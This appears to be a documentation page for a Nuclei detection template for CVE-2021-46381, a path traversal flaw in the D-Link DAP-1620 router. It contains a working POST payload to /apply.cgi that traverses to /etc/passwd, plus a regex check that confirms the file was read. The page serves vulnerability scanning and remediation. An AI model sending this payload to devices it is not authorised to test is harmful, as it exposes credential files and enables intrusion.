Skip to content
Nuclei Templates

D-Link DAP-1620 - Local File Inclusion

ID: CVE-2021-46381

Severity: high

Author: 0x_Akoko

Tags: cve2021,cve,lfi,router,packetstorm,dlink

Description

Section titled “Description”

D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].

YAML Source

Section titled “YAML Source”
id: CVE-2021-46381


info:
  name: D-Link DAP-1620 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: D-Link DAP-1620 is susceptible to local file Inclusion due to path traversal that can  lead to unauthorized internal files reading [/etc/passwd] and [/etc/shadow].
  impact: |
    An attacker can exploit this vulnerability to access sensitive information, such as configuration files or credentials, leading to further compromise of the device or network.
  remediation: |
    Apply the latest firmware update provided by D-Link to fix the local file inclusion vulnerability.
  reference:
    - https://drive.google.com/drive/folders/19OP09msw8l7CJ622nkvnvnt7EKun1eCG?usp=sharing
    - https://www.dlink.com/en/security-bulletin/
    - https://nvd.nist.gov/vuln/detail/CVE-2021-46381
    - http://packetstormsecurity.com/files/167070/DLINK-DAP-1620-A1-1.01-Directory-Traversal.html
    - https://github.com/SYRTI/POC_to_review
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2021-46381
    cwe-id: CWE-22
    epss-score: 0.02555
    epss-percentile: 0.90197
    cpe: cpe:2.3:h:dlink:dap-1620:-:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dlink
    product: dap-1620
  tags: cve2021,cve,lfi,router,packetstorm,dlink


http:
  - method: POST
    path:
      - "{{BaseURL}}/apply.cgi"


    body: "action=do_graph_auth&graph_code=94102&html_response_message=just_login&html_response_page=../../../../../../../../../../../../../../etc/passwd&log_pass=DummyPass&login_n=admin&login_name=DummyName&tkn=634855349&tmp_log_pass=DummyPass&tmp_log_pass_auth=DummyPass"
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"
# digest: 4a0a00473045022100cb16dc14ce834932d62df69938ef037036acc0b1844e94ddb8278f5c630d2449022022c184aacb2bfecf411bc19d294c01e6e225d76e76436891f53505d47c288188:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-46381.yaml"

View on Github